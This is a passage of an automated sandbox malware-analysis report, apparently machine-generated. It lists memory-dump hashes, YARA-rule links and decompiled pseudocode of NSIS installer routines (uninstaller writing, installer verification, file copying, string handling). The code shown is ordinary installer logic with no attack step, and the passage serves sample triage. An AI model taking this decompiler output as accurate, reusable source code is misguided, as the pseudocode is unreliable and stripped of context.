                                                                                                                • Source File: 0000000F.00000003.467146691.000000000E950000.00000040.00000001.sdmp, Offset: 0E950000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f8471b42bb60dfd479209386e0138b87f0d84b909fdc081f1061431169bc645e
                                                                                                                • Instruction ID: fcd737bc37942f52cf1217becd00285331c18773524289fef17524fa01df66b9
                                                                                                                • Opcode Fuzzy Hash: f8471b42bb60dfd479209386e0138b87f0d84b909fdc081f1061431169bc645e
                                                                                                                • Instruction Fuzzy Hash: C3115CB220528457C315EA79EC4099E7797DBC2304B00CA29DA45CB761EF309D0AC3E5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0E950488, Relevance: .0, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000003.467146691.000000000E950000.00000040.00000001.sdmp, Offset: 0E950000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: de13559d82b3953953e8a846711e67e14ad87207e3bce4868a49db3f0eaab113
                                                                                                                • Instruction ID: be8bf70c8f0ae10bb7a2adbac6a71efa1f1638a742be05f1e37047eca74c1281
                                                                                                                • Opcode Fuzzy Hash: de13559d82b3953953e8a846711e67e14ad87207e3bce4868a49db3f0eaab113
                                                                                                                • Instruction Fuzzy Hash: 6801F7B130420857C318EA79EC50A6E77D7EBC4218B10C939DB09CB724EF31AC0A87E5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0E77D007, Relevance: .0, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.475987544.000000000E77D000.00000040.00000001.sdmp, Offset: 0E77D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6f4d84b47137ea33996a28d63b6a26400e35aa1218619c35c1ac1df2fbf4ba2c
                                                                                                                • Instruction ID: 31689b03370da7658e433a55b5b904b9decac377cdb787a4ad0bcc8e32b56f24
                                                                                                                • Opcode Fuzzy Hash: 6f4d84b47137ea33996a28d63b6a26400e35aa1218619c35c1ac1df2fbf4ba2c
                                                                                                                • Instruction Fuzzy Hash: 0F019E6140D3C09FDB224B219C94762BFA8DF53224F1984DBE9848F2ABC2785C44CBB2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0E77D01D, Relevance: .0, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.475987544.000000000E77D000.00000040.00000001.sdmp, Offset: 0E77D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5ef5c701703967833876c1765b315789f21286118e37f02f7d887b22fbebcdfa
                                                                                                                • Instruction ID: ded34454c2bd5ed9b8e4a007e641e05e6fbc039edd4f6543bd28417d66426504
                                                                                                                • Opcode Fuzzy Hash: 5ef5c701703967833876c1765b315789f21286118e37f02f7d887b22fbebcdfa
                                                                                                                • Instruction Fuzzy Hash: B001FC704093409ADF304A16ECC4767BF98DF42268F18D859EE845B256C3749C45CAB1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0E950439, Relevance: .0, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000003.467146691.000000000E950000.00000040.00000001.sdmp, Offset: 0E950000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6e66b93cbcf4139da6ea20baadc832f61014ee6bbd55cfbe4860293ee1f54e03
                                                                                                                • Instruction ID: 25901b54a3f175b56d0f67d8f1b77eed33b8a9f5bf2b0a1ffef3b165d5595717
                                                                                                                • Opcode Fuzzy Hash: 6e66b93cbcf4139da6ea20baadc832f61014ee6bbd55cfbe4860293ee1f54e03
                                                                                                                • Instruction Fuzzy Hash: C4E0CDB31092D11BD3015764F81454E7BF9DFD2214B048CAFD584D7195DDA05C07C3B1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 00402E55, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E00402E55(struct _OVERLAPPED* __ebx) {
				void* _t29;
				long _t35;
				struct _OVERLAPPED* _t51;
				void* _t54;
				void* _t56;
				void* _t58;
				void* _t61;
				void* _t62;
				void* _t63;

				_t51 = __ebx;
				 *(_t63 - 0x10) = 0xfffffd66;
				_t57 = E0040145C(_t54, 0xfffffff0);
				 *(_t63 - 0x14) = _t26;
				if(E00405D51(_t57) == 0) {
					E0040145C(_t54, 0xffffffed);
				}
				E00405E5C(_t57);
				_t29 = E00405E7C(_t57, 0x40000000, 2);
				 *(_t63 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					_t35 =  *0x47eb0c;
					 *(_t63 - 0x44) = _t35;
					_t56 = GlobalAlloc(0x40, _t35);
					if(_t56 != _t51) {
						E00403368(_t51);
						E00403336(_t56,  *(_t63 - 0x44));
						_t61 = GlobalAlloc(0x40,  *(_t63 - 0x24));
						 *(_t63 - 0x10) = _t61;
						if(_t61 != _t51) {
							E0040337F( *((intOrPtr*)(_t63 - 0x28)), _t51, _t61,  *(_t63 - 0x24));
							while( *_t61 != _t51) {
								_t53 =  *_t61;
								_t62 = _t61 + 8;
								 *(_t63 - 0x38) =  *_t61;
								E00405E38( *((intOrPtr*)(_t61 + 4)) + _t56, _t62, _t53);
								_t61 = _t62 +  *(_t63 - 0x38);
							}
							GlobalFree( *(_t63 - 0x10));
						}
						WriteFile( *(_t63 + 8), _t56,  *(_t63 - 0x44), _t63 - 8, _t51);
						GlobalFree(_t56);
						 *(_t63 - 0x10) = E0040337F(0xffffffff,  *(_t63 + 8), _t51, _t51);
					}
					CloseHandle( *(_t63 + 8));
				}
				_push( *(_t63 - 0x14));
				E004062CF(L"created uninstaller: %d, \"%s\"",  *(_t63 - 0x10));
				_t58 = 0xfffffff3;
				if( *(_t63 - 0x10) < _t51) {
					_t58 = 0xffffffef;
					DeleteFileW( *(_t63 - 0x14));
					 *((intOrPtr*)(_t63 - 4)) = 1;
				}
				E00401435(_t58);
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t63 - 4));
				return 0;
			}












                                                                                                                0x00402e55
                                                                                                                0x00402e57
                                                                                                                0x00402e63
                                                                                                                0x00402e66
                                                                                                                0x00402e70
                                                                                                                0x00402e74
                                                                                                                0x00402e74
                                                                                                                0x00402e7a
                                                                                                                0x00402e87
                                                                                                                0x00402e8c
                                                                                                                0x00402e92
                                                                                                                0x00402e98
                                                                                                                0x00402ea6
                                                                                                                0x00402eab
                                                                                                                0x00402eaf
                                                                                                                0x00402eb2
                                                                                                                0x00402ebb
                                                                                                                0x00402ec7
                                                                                                                0x00402ec9
                                                                                                                0x00402ece
                                                                                                                0x00402ed8
                                                                                                                0x00402ef7
                                                                                                                0x00402edf
                                                                                                                0x00402ee5
                                                                                                                0x00402eec
                                                                                                                0x00402eef
                                                                                                                0x00402ef4
                                                                                                                0x00402ef4
                                                                                                                0x00402efe
                                                                                                                0x00402efe
                                                                                                                0x00402f10
                                                                                                                0x00402f17
                                                                                                                0x00402f29
                                                                                                                0x00402f29
                                                                                                                0x00402f2f
                                                                                                                0x00402f2f
                                                                                                                0x00402f35
                                                                                                                0x00402f40
                                                                                                                0x00402f4a
                                                                                                                0x00402f4e
                                                                                                                0x00402f52
                                                                                                                0x00402f56
                                                                                                                0x00402f5c
                                                                                                                0x00402f5c
                                                                                                                0x00402f64
                                                                                                                0x004030e6
                                                                                                                0x004030f2

                                                                                                                APIs
                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                • GlobalFree.KERNEL32 ref: 00402EFE
                                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                • GlobalFree.KERNEL32 ref: 00402F17
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                Strings
                                                                                                                • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                • String ID: created uninstaller: %d, "%s"
                                                                                                                • API String ID: 3294113728-3145124454
                                                                                                                • Opcode ID: 425adf467cb2c86b17273659995b3ed8045270cb1554a1bec104c33d48d0e7ae
                                                                                                                • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                • Opcode Fuzzy Hash: 425adf467cb2c86b17273659995b3ed8045270cb1554a1bec104c33d48d0e7ae
                                                                                                                • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040324C, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040324C(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x42c174; // 0x554f4
					_t11 =  *0x43dd38; // 0x40b308
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                                                                                0x0040325c
                                                                                                                0x0040326a
                                                                                                                0x00403270
                                                                                                                0x00403270
                                                                                                                0x0040327e
                                                                                                                0x00403280
                                                                                                                0x00403286
                                                                                                                0x0040328d
                                                                                                                0x0040328f
                                                                                                                0x0040328f
                                                                                                                0x004032a5
                                                                                                                0x004032b5
                                                                                                                0x004032c7
                                                                                                                0x004032c7
                                                                                                                0x004032cf

                                                                                                                APIs
                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                • MulDiv.KERNEL32(000554F4,00000064,0040B308), ref: 00403295
                                                                                                                • wsprintfW.USER32 ref: 004032A5
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                • SetDlgItemTextW.USER32 ref: 004032C7
                                                                                                                Strings
                                                                                                                • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                • Opcode ID: 6e71b36604eb8168b9de070626c23bed7d900371b4c5136878c27d07ffa20f21
                                                                                                                • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                • Opcode Fuzzy Hash: 6e71b36604eb8168b9de070626c23bed7d900371b4c5136878c27d07ffa20f21
                                                                                                                • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406064, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E00406064(WCHAR* _a4) {
				signed int _t5;
				signed int _t8;
				WCHAR* _t20;
				WCHAR* _t21;
				WCHAR* _t22;

				_t21 = _a4;
				if( *_t21 == 0x5c && _t21[1] == 0x5c && _t21[2] == 0x3f && _t21[3] == 0x5c) {
					_t21 =  &(_t21[4]);
				}
				if( *_t21 != 0 && E00405D51(_t21) != 0) {
					_t21 =  &(_t21[2]);
				}
				_t5 =  *_t21 & 0x0000ffff;
				_t22 = _t21;
				_t20 = _t21;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405D32(L"*?|<>/\":", _t5))) == 0) {
							E00405E38(_t20, _t21, CharNextW(_t21) - _t21 >> 1);
							_t20 = CharNextW(_t20);
						}
						_t21 = CharNextW(_t21);
						_t5 =  *_t21 & 0x0000ffff;
					} while (_t5 != 0);
				}
				 *_t20 = 0;
				while(1) {
					_push(_t20);
					_push(_t22);
					_t20 = CharPrevW();
					_t8 =  *_t20 & 0x0000ffff;
					if(_t8 != 0x20 && _t8 != 0x5c) {
						break;
					}
					_t8 = 0;
					 *_t20 = 0;
					if(_t22 < _t20) {
						continue;
					}
					break;
				}
				return _t8;
			}








                                                                                                                0x00406066
                                                                                                                0x0040606f
                                                                                                                0x00406086
                                                                                                                0x00406086
                                                                                                                0x0040608d
                                                                                                                0x00406099
                                                                                                                0x00406099
                                                                                                                0x0040609c
                                                                                                                0x0040609f
                                                                                                                0x004060a1
                                                                                                                0x004060a6
                                                                                                                0x004060af
                                                                                                                0x004060b3
                                                                                                                0x004060d0
                                                                                                                0x004060d8
                                                                                                                0x004060d8
                                                                                                                0x004060dd
                                                                                                                0x004060df
                                                                                                                0x004060e2
                                                                                                                0x004060e7
                                                                                                                0x004060ea
                                                                                                                0x004060ed
                                                                                                                0x004060ed
                                                                                                                0x004060ee
                                                                                                                0x004060f5
                                                                                                                0x004060f7
                                                                                                                0x004060fd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406104
                                                                                                                0x00406106
                                                                                                                0x0040610b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040610b
                                                                                                                0x00406110

                                                                                                                APIs
                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Char$Next$Prev
                                                                                                                • String ID: *?|<>/":
                                                                                                                • API String ID: 589700163-165019052
                                                                                                                • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402665, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E00402665() {
				intOrPtr _t22;
				WCHAR* _t35;
				void* _t40;
				WCHAR* _t41;
				WCHAR* _t43;
				void* _t45;

				_t43 = E0040145C(_t40, _t35);
				_t41 = E0040145C(_t40, 0x11);
				_t22 = E0040145C(_t40, 0x23);
				_push(_t41);
				 *((intOrPtr*)(_t45 + 8)) = _t22;
				E004062CF(L"CopyFiles \"%s\"->\"%s\"", _t43);
				if(E00406301(_t43) != 0) {
					 *(_t45 - 0x5c) =  *(_t45 - 0xc);
					 *((intOrPtr*)(_t45 - 0x58)) = 2;
					 *((short*)(_t43 + 2 + lstrlenW(_t43) * 2)) = 0;
					 *((short*)(_t41 + 2 + lstrlenW(_t41) * 2)) = 0;
					_t28 =  *((intOrPtr*)(_t45 + 8));
					 *(_t45 - 0x54) = _t43;
					 *(_t45 - 0x50) = _t41;
					 *((intOrPtr*)(_t45 - 0x42)) =  *((intOrPtr*)(_t45 + 8));
					 *((short*)(_t45 - 0x4c)) =  *((intOrPtr*)(_t45 - 0x24));
					E00404F9E(_t35, _t28);
					if(SHFileOperationW(_t45 - 0x5c) != 0) {
						goto L2;
					}
				} else {
					L2:
					E00404F9E(0xfffffff9, _t35);
					 *((intOrPtr*)(_t45 - 4)) = 1;
				}
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t45 - 4));
				return 0;
			}









                                                                                                                0x0040266d
                                                                                                                0x00402676
                                                                                                                0x00402678
                                                                                                                0x0040267d
                                                                                                                0x00402684
                                                                                                                0x00402687
                                                                                                                0x00402697
                                                                                                                0x004026aa
                                                                                                                0x004026ad
                                                                                                                0x004026bc
                                                                                                                0x004026c8
                                                                                                                0x004026cd
                                                                                                                0x004026d6
                                                                                                                0x004026d9
                                                                                                                0x004026dc
                                                                                                                0x004026df
                                                                                                                0x004026e3
                                                                                                                0x004026f4
                                                                                                                0x00000000
                                                                                                                0x004026fa
                                                                                                                0x00402699
                                                                                                                0x00402699
                                                                                                                0x0040269c
                                                                                                                0x00401a13
                                                                                                                0x00401a13
                                                                                                                0x004030e6
                                                                                                                0x004030f2

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory on Reboot("C:\Users\user\AppData\Local\Temp\nsq2FFD.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                  • Part of subcall function 00406301: FindFirstFileW.KERNEL32(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                  • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                • String ID: CopyFiles "%s"->"%s"
                                                                                                                • API String ID: 2577523808-3778932970
                                                                                                                • Opcode ID: 76b1160061a8bcde82d673e25faa9719cd8acd17af1c4b15f649e1f749d05235
                                                                                                                • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                • Opcode Fuzzy Hash: 76b1160061a8bcde82d673e25faa9719cd8acd17af1c4b15f649e1f749d05235
                                                                                                                • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406250, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E00406250(void* __ecx, WCHAR* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
				WCHAR* _v8;
				intOrPtr _v12;
				int _t22;
				void* _t31;
				signed int _t34;
				int _t38;
				intOrPtr _t39;
				intOrPtr _t42;
				void* _t44;

				_v8 = _a4;
				_t34 = 3;
				_t22 = _a8 / _t34;
				_t42 = 0;
				_v12 = 0;
				_t38 = _t22;
				if(_a16 <= _t38) {
					_t39 = _a16;
				} else {
					_t39 = _t38 - 1;
					_v12 = 1;
				}
				if(_t39 > _t42) {
					_t31 = _t39 - 1;
					do {
						asm("sbb eax, eax");
						_t22 = wsprintfW(_v8, L"%02x%c",  *(_t42 + _a12) & 0x000000ff,  ~(_t42 - _t31) & 0x00000020);
						_v8 =  &(_v8[3]);
						_t44 = _t44 + 0x10;
						_t42 = _t42 + 1;
					} while (_t42 < _t39);
				}
				if(_v12 != 0) {
					return lstrcatW(_a4, L"...");
				}
				return _t22;
			}












                                                                                                                0x0040625a
                                                                                                                0x00406264
                                                                                                                0x00406265
                                                                                                                0x00406267
                                                                                                                0x00406269
                                                                                                                0x0040626c
                                                                                                                0x00406271
                                                                                                                0x0040627d
                                                                                                                0x00406273
                                                                                                                0x00406273
                                                                                                                0x00406274
                                                                                                                0x00406274
                                                                                                                0x00406282
                                                                                                                0x00406285
                                                                                                                0x00406288
                                                                                                                0x0040628e
                                                                                                                0x004062a4
                                                                                                                0x004062aa
                                                                                                                0x004062ae
                                                                                                                0x004062b1
                                                                                                                0x004062b2
                                                                                                                0x004062b6
                                                                                                                0x004062bd
                                                                                                                0x00000000
                                                                                                                0x004062c7
                                                                                                                0x004062ce

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: lstrcatwsprintf
                                                                                                                • String ID: %02x%c$...
                                                                                                                • API String ID: 3065427908-1057055748
                                                                                                                • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405073, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory on Reboot("C:\Users\user\AppData\Local\Temp\nsq2FFD.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                • API String ID: 2266616436-4211696005
                                                                                                                • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402175, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory on Reboot("C:\Users\user\AppData\Local\Temp\nsq2FFD.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$EnableShowlstrlenwvsprintf
